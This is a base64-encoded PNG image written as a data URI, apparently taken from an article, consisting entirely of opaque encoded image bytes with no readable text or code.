aaarticlea/png;base64,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bfHM9XegtuyiHwhAIBkB9512oiuT+HL5Kh+uo+2HH37YitfTTjvN7LbbbilxqnorV660f1HC0eX5+5wo9EdU3W9PuN1wfb9u1Ph8G8L2+NtR7YTzfJuj+kp2lOp/rfAxy3XEWUMI4jR43HHHmV/96lemRYsWplWrVrbKtGnTqsSkyl3vUtQ+vcruF7/4hW1DHt7DDjvMvi0kKuku6dJLLzUbbbSRfdtF586dzbHHHmu+/PLLqOIZ8/QmEgH0/55++ulU+auvvtrue/bZZ1N58qT55ffaa68q7U+aNMk+QmnXrp1ZY401TK9evcyYMWPMokWLqpSLYqC3eKiuvNyuD70pRSnJmDWW3Xff3fJZc801Td++fc3BBx9sHnjggZxfCaq23LiaN29uNthgA/u46KqrrrJvHgmnmnCIcy7ccMMNlpH6UfJjtTVmpe+//95MmDDB7LvvvvY46Fxp27atGTp0qHniiSfCJhfknI06zq7jqH1xxu7q++eEzrWOHTuaQw45xHz44Yf2+LhzaJNNNkkbay4Z5fRUIxculIVAqRLItIyWE1/+f41R2/5jdbdfIQJNmjSx1273GN09atd1Qr+3fj2V8f98oejq+QLQrxv+7Oxy5V19lx/uK2y/O3auXth+v11X17fXZ+Tb7MqU6rlRSnbnLGB1kDVByv+LOmB6nKCY1L/97W9pPPr06WNuuukmM3r0aLvvnXfeMQcddJDRG0JUXnGsim1UHE1UOuqoo8wf/vAH061bNzNx4kT75gsJxj333NPaFTddf/315s4777TFJXJkr95I4pLaVXL/9VmPSFROgmn8+PHmjjvuSJWXSN91113ta/lefvllK6jVx3/+8x+z5ZZbmtmzZ6fKhhm89957RmJYYuPcc8+171P2U65jls0SahKtL774olm2bJm57bbbzLx588x+++2XJqirdBbakGddd9etW7e278xWW/fcc4+9u9bNi46ln2rCIe65IKGm46AYJqXnnnsuFZct25SWLFliDj30UPtZ54luiBTT3alTJyvsw3YX4pwtRJt2QEHyz4nHHnvMvvJV3x0xcTdzij+XUK5JkhAmQQAC9YeA/52OEmJx8iTq9GRJjoI333wzFUfqBKEv+lx7+g3W9UG/yyNGjDDHH3+8mT59ekogq9xbb71l5zXI2TJs2DCz//772+2FCxemxPD5559vdF1S3plnnmk0efxPf/pTqp1vvvnGXHvttea3v/2tdbyojb/85S/mgw8+qNKXjqicM6eccop1wv3yl7+03mTN2XHjiGJR3ZkQpYeqK8++5AQaBAfp5+ATr53wRatr167VTsSSKLrvvvvSLJGnVGLzoosuMieffHKV/W6fvK76AnTv3t3u18mn/nSy6zV3fsythIiEqoSZ3unctGnTVJs6qceOHWu39aVq3LjaCAlbTgHc+hLqjlR9ufY0q71Lly5WEMuDqRPfMXn33Xet0FR553GWMJK43Xjjjc3MmTOrxOJq37bbbmv3ycvq3/06BvIOSvTKq6ykVRskej/77DPrZcx1zPriP/nkkzYGSd5Xl2S7vHPy0olxtqQflx122MHaLt6+7cuXLzfrrbeevek48cQTbVM15ZDLuaD+dMMgPvrR0znhJ/cKVAl4n4F+mDQeHWN5xsPnSb7PWdmU7zaTfg8uu+wyc8YZZ9inArpRypbkXb/rrrvMPvvsY9Zaa61sxdkPAQiUAAFNupK4043u7bffbrRKiq4VuSbFusqJIdEmp4Keyuk3PCqpL/UpJ5jEoryzU6dOtc4HiVDdeOsa+8orr5iHHnrIvpZV1371IUeRrjV64qdrkPTEjBkzbL/6Ld9iiy3sEyhdq6Qf9ERWv+0SpBtuuKHRk0xdl2Wr+x3Tb+Ejjzxir+9ynnXo0MH2JYeTHAHuCWzUWDLlaexyFEl883uZiVJ6flLRn7MHVie7BIH/d8ABB6RblEOOPI9OvKqaxIY8kBqUPIZ+ktdTSV8WX7wq75hjjqlSNs6GHr1KHOpC7YcPyJvlgtJ1Ur/wwgup5iTU5d104lU7rrjiCnvHJk9y+JGr2undu7cV6RKVUUk2OPGq/fLQKkBe9iUZsxPbvodY7epRurycblWJKFv8vCuvvNIeB30hw+OSp1lLWPmPqGvKIZdzIZvt8rSKuS9eVUfj0A+eBKyEb5KUTztd/7m0meScUD8KH9F5FXWzmYlD+GY2UznyIQCB0iAQ9sDK6ihPY7Y8OXkkJiUe5fHUU1VdM+TBDNeVsJOIveSSS6xHdMiQIfb6oWvSjTfemPKMbr755nbil26aJSzVpn4bdd2SKHXt6potx4naUNntttvOXoPvvvtu66CRY+V3v/udDW+QsJZzS9ds3y6NW3ZrBSV5hKUh5LEN95XLUU0qxnLpg7KVBHIWsBJZW221VZW/mk7SkrgLJ92dKeluyk/yUipFxfXpEXemFRKqNBLakPdYyb+o67PuEjPtc/muKd1FKvki1O9Gd4lKrpy/T5/D3kN/f5Ixa2aoYpOOPvpoeyerL/Mbb7xhm9UPRtx328ujqpRpXPKqywvqUk055HIupDqt5oM83lreRSEfOjcUX6w/FxYiL3KSlG87ZUMubSY5J9SHlrbRzcjll18ee9gI2NioKAiBkiAQJWCTGq4nev/617+skJTjRd7T3/zmN/Y3RmFmLulpnlYjksfTJdkhwSrB68pG/d44B5fCxvwkj2u4/H//+1/rddUTzDgpXL9nz562mt9XWIxn2lY9BGwc6vkpk/0Ze4x+dMdVkyThGU5OYIVPBjexS0tIRSW1leui9ro7U8C5vngKGZCHSpO1dFeoxx0KgZDg0Z3mggULbBiAHk34yQmhTHa5/EyCyS1XFjWmJGPWmOQlv/jii63XTY9o9CfP4znnnGPvNuOkbOMKt5GtfDYOuZwL4b7D2/Koy7OtNv/+97+bgQMHprzmOqbysuuOPUnKp52u/1zaTHJOqB8x0F8uKfwDn0tdykIAAnWPgPtOh6+vSS3VUy15QPWn+RyaW6LH85qHIOeJrqMKudO2nl5GJXlndR2WTfrtluBVKJ2ux24ys9qpLmm/QsfkdU2a5PhRqgmbmtRNanc51suLgK1NcBJ6enSgkzoqRc2Ijyrn5yluRZN6HnzwQbt2nQLDBwwYkLpTVDiDQggUmyNhu8suu1gvnp/0OF2iIpNdLl/lck1Jx6w7W02Gu+6662zows0332zHKPGt5U/CKyhE2ZVtXOE62crXhEO4r2zbCsb/7rvvzD//+U8b4+WnTHFa2dqsK/uTnhNJ7EfAJqFGHQjUXQJhD6zzKObDYsWP6nG9nBWPPvqoFbTK01wDPYnUhOmopBt42aHJWboOK3xADgj91slxpGuXki8Ow0LRjUPjC++L6tO1l6nNuG24tvPJMZO95P9MIOcQgmLDk7BUmjVrVpopuoPL1fvqGvFDBeRtVfhAeJ/yXWhBuHPFuSop5jIquXxN5so1JRnz5MmT7d2ukiaISbTKE/vXv/7V5mliTpzkxpUpVlR32vJcu1RIDlH2VieuFMekpBCKcPIfbYX3lcJ2knMi6biqY5y0TepBAALFIxAWsL4lToTV5L/akwNFyV2HNCdBk6u32WabyD/NadFkaV27DjzwQLsagJa6lHPJhdiFBWLYRnmCNRlLTqjwvqht2RfOdyzC+XG2XXuuDf4XlkDJCVj3ulqt76kvg5/0atWkSY/U9QWSyHvqqadSsa9qz4lbeTC1jNTee++d1o2WA9GPgia5hR9zKC5Uk9EUh5np8Ulag15GkjFrlrlmmoaTE3PhiU3hcm7bjUuTwcKP2xW3pPV6FTAfLl8IDlE2Oo+2E6RaqkxhEhLcWmZNSa9x9ZPKagZrKack54TGqycJmgCpczxuCk/ei1uPchCAQN0k4H+nJcyUwuIwjuX6vQ3HpaqeHvkrREv96LqnpFV65MiJcj65vtzvuESon3J5sionkfpwDowqDdXChuNZC12VfRdZBexXX31lH427g+K2w5OrwiQl4lTPnZA6obWtfAmhqH3qQzGo2ufEqZb28E9ezRBUgPjbb79t4zj1SF8TjRRArkByN6FMdWRr3KQlLzQZSR5ciTwnflRfk550N6m7Oi31ETVRTF+a8847z35B9bh6/vz59vG1HoVoFqW+kFqf1P1wZGIQxTXpmLVMkoSnluJyok2zOyVetcxInOTGpbhfrd2ncelYSpSLv8IrtB6pS/niEOdcUJ+6m1dSiITY6QUHOk56ZKV1AZU00UyCWo+hJOC0ZqDzCiikwa2ZWohzthBtakzVnROKPfNX9bAQfkpa71CzgbWcTNyEBzYuKcpBoDQIuO90HK9ipjK6hmlFATkxTj31VLvslK5x+q9rtMStJhPr2qo29FRTXlh5VrWKiiZbaTlATfbS/BKV0e+WrpVyvmg1Ab1wRvt0bVfybQlvu33y3uoaLZt0/dOLiNw8EE1+deXckYoaX6a2o8pmyiuNM6G0rcy6Dqxc93rbRjhpJrMuhJmSFk9XDEs46WTSSRw141pLZOjOSYvm+0mxMW7SivL1xdEablr+Qq+x036JT60Dq/hUrXWqpHib6u72wrZp0pY8W5qprQu9n/ToXQsh68tZ3XJd8mwp5lIePokjLTOiOB59af3Zl7o7jGKQiWuuY5anWF9eCWh5SHUjIFsGDx5sx6ZZmrkkf1wSw+uvv77R8mkSh/5yYq7NmnKIey5oXPI2K9ZKQlTHXPzduacfQAl5nQeyW+PWqgS66XEvsdBLMHTjUohzthBtOsbhc0Lj0HIyupHadNNN7ZqGuiH0Bai+N6effrq9sMRdB1YhInqMx7qGuXxjKAuBuktAQlMOCV1X9WRRgjMXh48bmX439dsrsarfbLUnAaprm55caoUCP8nJIHEqh4gcDbp2aAkuOYbck01dr3RtV5v6zdGqR7qun3TSSXYyrlYy0ORkTfTSC1yikq4FelGNfvc1eUyOLTk1dM1y110t+SgBrd83f0lOd+1SLG5U+FlUfy5P41G/eglTeJ5MdfXKfZ9uApKkSAGLxyUJSupAoG4QkNdXcc9a61cxZTVJepKhhb31YgwEbE1IUhcCdYfAvffea0OJfAHrnkTVHStLzxL9RiJgkx23JCI2awhBMlOoBQEIFJqAnjq49WD9vrTChDyvUbHaSWzihjYJNepAoO4SCIcQ1F1LS8+ycIhC6Y2gdCwuuWW0SgctlkKgsAQUB66QF4W1aOKaQlYUMqLwAD26U7xzPhICNh8UaQMCdYeA/532YzjrjoWlaQnitXaPGwK2dnnTGwTyRkATKPQoULFsmpSmiY+KTda21mFMsuZwlHEI2Cgq5EGgdAmEBWzpjqTuWZ7kUXjdG0VpWISALY3jhJUQSCOg94nrr9CJZbQKTZj2IVC7BDIto1W7VtTP3hCwtXdciYGtPdb0BIGSJIAHtiQPG0ZDICMBYmAzoqnxDsIIaowwdgN4YGOjoiAEypNAo0aN0l5iUZ4kGDUESp+Alt/zb0rljV22bFlqjfLSH2HxRiCOeGBrjz8e2NpjTU8QKDkCEq9t27a1awmH38RWcoPBYAiUOQF9h7W+qnvhj77fWpdd67Ly/a7ZySF+r732ml1vXVxJhSfAOrCFZ0wPEChZAlqOS6sbzJw5077sgQQBCJQuAXlbdUOqNxjqjYx6W+TixYvN1KlTjV4NTkpOwN0M6KUMuinwX46QvNXyqZnEc42ALZ/zg5FCAAIQgAAEqhCQiNVbCnWzSqoZgcaNG5vmzZsjXhNgRMAmgEYVCEAAAhCAAAQgAIHiEUgiYImBLd7xomcIQAACEIAABCAAgQQEELAJoFEFAhCAAAQgAAEIQKB4BBCwxWNPzxCAAAQgAAEIQAACCQggYBNAowoEIAABCEAAAhCAQPEIIGCLx56eIQABCEAAAhCAAAQSEEDAJoBGFQhAAAIQgAAEIACB4hFAwBaPPT1DAAIQgAAEIAABCCQggIBNAI0qEIAABCAAAQhAAALFI4CALR57eoYABCAAAQhAAAIQSEAAAZsAGlUgAAEIQAACEIAABIpHAAFbPPb0DAEIQAACEIAABCCQgAACNgE0qkAAAhCAAAQgAAEIFI8AArZ47OkZAhCAAAQgAAEIQCABAQRsAmhUgQAEIAABCEAAAhAoHgEEbPHY0zMEIAABCEAAAhCAQAICCNgE0KgCAQhAAAIQgAAEIFA8AgjY4rGnZwhAAAIQgAAEIACBBAQQsAmgUQUCEIAABCAAAQhAoHgEELDFY0/PEIAABCAAAQhAAAIJCCBgE0CjCgQgAAEIQAACEIBA8QggYIvHnp4hAAEIQAACEIAABBIQQMAmgEYVCEAAAhCAAAQgAIHiEUDAFo89PUMAAhCAAAQgAAEIJCCAgE0AjSoQgAAEIAABCEAAAsUjgIAtHnt6hgAEIAABCEAAAhBIQAABmwAaVSAAAQhAAAIQgAAEikcAAVs89vQMAQhAAAIQgAAEIJCAAAI2ATSqQAACEIAABCAAAQgUjwACtnjs6RkCEIAABCAAAQhAIAEBBGwCaFSBAAQgAAEIQAACECgeAQRs8djTMwQgAAEIQAACEIBAAgII2ATQqAIBCEAAAhCAAAQgUDwCCNjisadnCEAAAhCAAAQgAIEEBBCwCaBRBQIQgAAEIAABCECgeAQQsMVjT88QgAAEIAABCEAAAgkIIGATQKMKBCAAAQhAAAIQgEDxCCBgi8eeniEAAQhAAAIQgAAEEhBAwCaARhUIQAACEIAABCAAgeIRQMAWjz09QwACEIAABCAAAQgkIICATQCNKhCAAAQgAAEIQAACxSOAgC0ee3qGAAQgAAEIQAACEEhAAAGbABpVIAABCEAAAhCAAASKRwABWzz29AwBCEAAAhCAAAQgkIAAAjYBNKpAAAIQgAAEIAABCBSPAAK2eOzpGQIQgAAEIAABCEAgAQEEbAJoVIEABCAAAQhAAAIQKB4BBGzx2NMzBCAAAQhAAAIQgEACAgjYBNCoAgEIQAACEIAABCBQPAII2OKxp2cIQAACEIAABCAAgQQEELAJoFEFAhCAAAQgAAEIQKB4BBCwxWNPzxCAAAQgAAEIQAACCQjkJGC/++47c8MNN5jdd9/ddOrUyTRt2tS0a9fODBo0yIwbN84sXbo0gQnVV7n11ltt259++mn1BWthb12ypRaGSxcQgAAEIAABCECgThJosHr16oqwZQ0aNAhnmTfffNPsu+++VqSefPLJZo899jAdO3Y0X3zxhZk2bZq58MILzeLFi831119vRo0alVY/acauu+5qJk2aZN566y3Tt2/fpM3kpV5dsiUvA6IRCEAAAhCAAAQgUGQCFRVpUjSrRY2zlggKzJs3zwwePNg0adLEvPTSS6Znz56pap07dzb9+vUzBx10kBk6dKgZPXq0CUSx3SZBAAIQgAAEIAABCEAg3wSyhhBIFR988MH2Ef6ll15aRbz6xrRo0cLoEXujRo3M0UcfbZYsWZJvW2kPAhCAAAQgAAEIQAACJquAfeyxx8yLL75o2rdvb0MIqku9evUyu+22m/nmm2/M5ZdfbotK9Cokwf29/fbbqSZOPPHEVH6zZs2qNK1YW9VR+ICSvLyuDcXguv0u78EHHzRXXXWV2WyzzUzz5s2tvfICz58/P9VuoWypYjgbEIAABCAAAQhAAAKFJaAY2PBf4HVNpWOOOUaBCRV77rmnn53x8znnnGPLb7HFFrbMypUrK4K42YqddtrJ5gexrKm6X3/9td3Xtm3bijXWWKNKm6tWrapS77nnnrPb+gvibivc/iOPPNK2279//4ptt9224qGHHqp45ZVXKi644ALbZhCnW/Hee+8V1JaMMNgBAQhAAAIQgAAEIFAtgbAOjbOdNQZWk6eUunfvHktJu3LO0yrPqv4UPxtOCjvQX9SksUB8Gv25emuvvbb1qvpJ+53n9rPPPjNz5861dZQCQWvr/vGPfzS///3vjTzJhbRFfV522WXmjDPOMGPGjDHnnntueLhsQwACEIAABCAAAQjkgUDWEILPP//cdrPmmmvG6s6VCzykRstu1VY6/PDDU+LV9XnEEUeYhg0bmscff9x8+OGHBTflgQceMIFX2dx3330F74sOIAABCEAAAhCAQLkSyCpg5flUUlxrnOTKKQ5V68TWVlL8bTi1bt3adOvWzWYHYQXh3Xnf1lJimvDm4n/z3gENQgACEIAABCAAAQiYrCEEmjw1ZcoU88EHH8TCtWDBAltO9WozrbXWWpHdtWzZ0uY7T3JkoTxlDhw40OiPBAEIQAACEIAABCBQOAJZPbB77bWX7X3GjBnmxx9/zGrJ9OnTbZkRI0ZUKeviXIMo3rQ24np30yp6GV9++WXkbj3SV3KeZH0utC2RhpAJAQhAAAIQgAAEIJAXAlkFrN64tfXWW9s3cGmpqurS+++/b55++mkrFjWRyU8KKVBasWJFlXxNvgpWKsjYbNQEr6jCwUoDadl6S5jzHA8YMCC1v9C2pBlCBgQgAAEIQAACEIBA3ghkFbASkLfffrtdAUDrtvrrqvpWyIt62GGHGXlYJ0yYYIKlsaoY2adPH7s9a9asKvn33HNPtYNur0oXAAASTElEQVRp06aN3e9E7uzZs02wRJd9tayfbr755rRJYzfeeKN9K5jWje3atWuqeKFseeGFF8whhxxinnrqqWrHxE4IQAACEIAABCAAgeQEsgpYNd27d28bB9uqVSsjT+b5559vZs6caRYtWmTmzJljXyqgZaskTuWldWEHvlkSdnpLV7BOrG1LqwLcdtttZuLEicaJVMWpukf+ru4222xjPz755JN2Ipn6WrhwoenRo0eVUSv2dMiQIebhhx+2tl100UVm7NixJlgH1lx99dVVyhbKllNOOcWO6bjjjqvSHxsQgAAEIAABCEAAAnkkELVYbKbVZoNlsSrGjx9fEXg07QsCgnVWKwLxaV8gEKx7WrFs2bJMVW2+XjKw+eabVwSrE1R06NChQi9JCGJXK9q1a2dfRqC/nXfeuUobetlBsByW7S949F+x1VZbVUydOjVV5thjj7X1AuFcce+991YEAtuWk12jRo2qCMIaIm0qhC3Bm74qgnVtK0477bTIPsmEAAQgAAEIQAACEKhKIEqLZstroAJhPRw37jRcrxjb8nbqFbLy/I4cObIYJtAnBCAAAQhAAAIQgEBCAoGczblmrBCCnFulAgQgAAEIQAACEIAABApEoGQFrN7ypZhZ97YvrW6g7SQqvkBsaRYCEIAABCAAAQhAoAAESjaEQJO5jj766DQkmljWqVOntHwyIAABCEAAAhCAAATqHoEkzseSFbB1Dz8WQQACEIAABCAAAQjkSiCJgC3ZEIJc4VAeAhCAAAQgAAEIQKB+EEDA1o/jyCggAAEIQAACEIBA2RBAwJbNoWagEIAABCAAAQhAoH4QQMDWj+PIKCAAAQhAAAIQgEDZEEDAls2hZqAQgAAEIAABCECgfhBAwNaP48goIAABCEAAAhCAQNkQQMCWzaFmoBCAAAQgAAEIQKB+EEDA1o/jyCggAAEIQAACEIBA2RBAwJbNoWagEIAABCAAAQhAoH4QQMDWj+PIKCAAAQhAAAIQgEDZEEDAls2hZqAQgAAEIAABCECgfhBAwNaP48goIAABCEAAAhCAQNkQQMCWzaFmoBCAAAQgAAEIQKB+EEDA1o/jyCggAAEIQAACEIBA2RBAwJbNoWagEIAABCAAAQhAoH4QQMDWj+PIKCAAAQhAAAIQgEDZEEDAls2hZqAQgAAEIAABCECgfhCIFLAVFRX1Y3SMAgIQgAAEIAABCECgzhJIqjkjBWydHSWGQQACEIAABCAAAQiUPQEEbNmfAgCAAAQgAAEIQAACpUUAAVtaxwtrIQABCEAAAhCAQNkTaFz2BAAAAQhAAAIQqOME3n1tsRk7/LY0K39/ye5m8AGbVMn/8YfVZnT3f1bJO2jsjmbkcQPNFcc/at6Y9oE5+/5RZt2ebdLaIwMCcQjoPHr2gbdSRe9c8EfTqHHt+kRrt7c4VCgDAQhAAAIQgEAVAutv3MGMf+NYs/ex29j8jt3Xttvbj+yXRkpCQvv2HTPIdO+3jv08/KgBttz7sz4xn3+ywixb/FVaPTIgEJfA0ecPtedVh26t41bJezkEbN6R0iAEIAABCEAgvwQkSlu1bW6GHrK5adDAmCULPjcL31tumjRtFNmRyj73yBwz5ODNbL2mzSofuI6770BzwROHmo236xZZj0wIxCHQrEUTe1410MlYpISALRJ4uoUABCAAAQjkSmCd9VqbTXbobqtNvuP1jNVnP/eh+fTjr8yO+21Upcxa7dY0PTbpkLEeOyBQKgSIgS2VI4WdEIAABCAAgYDAkIM2NW88u8BMf3iOOfzsXUzzVk3TuEwKxO2gvfqYFmutYfe9/cLH5i/73Jkqd8iZO5sRv9s6rd5rU+abh6990bw7c7H5duUPpk3HFmazndc3+wTxs+5x8aXHPGKm/+ftKnXPvGt/s+mOlcL6iVtmmvGnPW3OfmCU6Tewqy33ZiCoz/7V3ak6Ww7paf58675p/YczNM7/XPOi+WD2UrPiy29N+y5rmZ6bdTQDh/cxWw/bwDRsVNUDqPjeRwL7572yyKxa8b1p17ml2XJILzPy+IGmTYcWqeYfvf5lc8u4Z1Lbl/z3CNNlg7Z2++azJpuJN7xiP8vDffv7f0iVi+IoPnf8faqZ8+JC881X39qyt793ommyRqXE0hgeue4la5OYtu3U0sYfD9i1p73BWLNV5TFyncQ5BimDgg+5th+XkeujYnWFmTj+FfP07a+bTwLPf8u1m5lt9uhtDhq7k29G2udcx5HWQJaMjB7YpAvLZumP3RCAAAQgAAEI1ICAxEOrNs3Nt998b6Y99PNEGtfkii9WmecfnWeGjN401UvvLde1MYujTt0hY88PXfWCOffg+0yX3u3MhU8dZsbPOtb83wVDzetTF5hTh91q5r/5ia3724uGmhOu3st+Hji8t213o23XS7U749G59vOMiZX/9bnv1l1sObV9zMXDzAlXVdZPVYr4oHb+NvpeKyzPe+wQc9Ps48zxVww3i95fbi4++iGz/JOvq9R6OBC6fz3wHtOidTNzweOHmFvmjglsHWZeevIda/9Hcz9LlR966ObWnn6DKgW239DoU3e0+yTUwknCUxPnth/Z1+5asuALc/6hD5j1NmxvRv95B9Nri05VqojpX0fda0Xq+T+N4Y/XjjDfrfrBjD99knnmrllp5eMcA1cp1/ZzYeT6uObkJ6zYb9+llRl7237mpBv2Ni2D8++8Q+83q39cHUZkt+OeSzXRmhkFbKRFZEIAAhCAAAQgUFQCjZs0Cjx3lZO3JgVesXCaev9sKzZ8UeliaNdo3iRc3G7PfXmhueO8qWbzwJv4m3N2Met0Xcs0b9nUbD54fXP85cOt9/NfJz1hyypfIlr/33j2A+sBdjPQv1q20np7GzRsYGYEItq92FP75Z385IMvAs/whpFe47Bh8vip/ug/72i9lvJo9tq8kznxJ/Hsl5d387Zzp5pufdtbexVqIe/pJtt3Myf+a4SduHbJ7x428iYqqS3FcDaOmDm/xpqZ4ztbt1/TrvqwwRbr2naeuXuWOf32X5lfn7GzGXZ4fzPmij2N6itQec5LlUzXC2wac+We1oOtWOQem3Y0p4zfu7KcN4hcjoGq5dp+rozUx6uT37Nj1E3EqTfvY3n2GdDZHHjK9oFnu6dZ+tGX3ggqP+Y6jrQGYmYgYGOCohgEIAABCECgrhAYMnoza8p7ry9JeUadbZPvfCMIM6jcH9fex258xYrF7fau9Cz69fpu08V6EN9/Y4lZ+O4yu0viUAJGolSPsF164fF3TO8B61qP62eLvjLvzFyU2vf8I3MDgdzdCt9Y6afogGkPVg1X0AoMV0w/KggJaJlqxtofiNMd9ulnxbOf5H1et0cb8+GcT81r/50fq+u4hbYMwgC69mmXKi4P7YR5J1g+j99UyXTHCJvkJT7gpO2s4HYp12OQqP0cGelcUtopCHXQjZOfhh62RZXtpOOIbCRGZrUxsHLtFnOGWQz7KQIBCEAAAhAoOwLy6vXuv66Z9+oiM+mON8yR5w6xDBS7qkflO++/cU5M5J1TuvGMSeaWs36ODXWNrFzxnf2otjv3qowVHbhnH/O/h942Eqb9d+lp9z//6BwzKMivCJ4svzXjI7tPdlbum2t2P6K//RwnDT9ygJkVxLRee8oT5rHxL5ttf9nXxr1K9EnE+kleP6WufX4WhP7+rhu2s6EHKrfFL3rE6T5WmS4/sYgq7Jhmsikcg5zrMci1/SSMdIOktF7fddKGqJsaebHldfdT3HF8OPfTGq1FXK2ATbOWDAhAAAIQgAAE6gSBXYIYVwnYaQ/MNpqUpcfTTweTt7YKRJ4edeeSVny+yhZXzGvfrTtnrKpVDFzqHwhB9fniE++Y/wtenrAqiMmdPf1D8/t/7h7ERlYEcZOTbRysbNOj5gXBRKythm6Qse3wjv679LBxo5pUNmPiPHP3hdPsn9bE1SPsAbv1SlVx9mt5p6jUrEWl13fFF5WTrKLKJMlr0brqBCy/jWw2hfvL9RgkbT8XRo5XpjoSsWEBG3ccEr81SVkFLF7YmuClLgQgAAEIQKAwBPQSg1vOfsbGp8rTqQlV0wOP6B+uGZFzhy2CCUtqp3HThjZ+NE5SrKe8mS88Ns+8GQjX5Uu+tisEtOlY+Wi/VxAn+k4gsBV6oFUINtmhW2pVhDjtq0z3jdYxx1023Pz2wh+Cx/8LzJR7Ztn+Ljj8QXPqLfsEM/krRayzXysPRKVVP3mQ0wSnW8fUBet6lb9dGd1WVPtRedlsCtfJ9RgkbT8XRuKlMJFMddyqC/5Y4oyjJpO3XF/EwIbPILYhAAEIQAACJUBAXrFtR1TGrGrZLD3OV2ylJmLlmjQxR2l+8KauqPS/f79txgXLYK38ujKUwJXRclZKCh14Plg1QBO0ft7Xu3Jf4D2VwFZoQS5p1v8+MF8s/cZW0aSrrYb2MicHM+AP/FPlSgoS6y4pzlVJca5R6aM5lSsQuHG6Mu4FD/Ie++mr5SvtSgE1Sc6mj+f9vPqB356YynvtUq7HINf2kzDSDYnSh28vTUOx8qvv0ryvKhRnHFpSLXwupXVQTYYEcCwBmw+lXI0d7IIABCAAAQhAIAEBhREoKd70wSueN78YtUnaJKY4ze5xxJb2DV9T75sdrFVaVcz98P2P5oGgbU2+Ck/A2ip4jK/JPXrEr+W25AV2yQnWKcEs9ndfW2zjV3NJN5052Uy5t+oyU6qv1+MqNfVWVHD2T3vwLRu+4CfFfir+VUt4hcV952DSlVJY+D4XrLFb0+Tb5FY/cG0uW/y1ufKEieazhT+/0jfXY5C0/VwYufNLK1v8GISJ+OnJCTMjEWUdx+XBuRSEHoTPpcjGqslsdNZZZ42rZn+VXUzoikuKchCAAAQgAIHCE2jfuZV9ZeyXn60MHvV+Zx+3hxfGlxUSdd8E3lOJOU2M6jdoPft4vnHjRlbwtlu3lVGcqGJW57262PTcpKNZM3gJwsJ5y4JJVE/a5a9OuXFkWttN1mgUtLnIxrfKW+dPTNI6qi88Ps8snv+52WS79cxuh0bPWs9E6cnghQgvP/2uWSd4eUGbYBktaZD3gnCECedMsd47xeuuvU7lywnaBRyaBl7aaf9+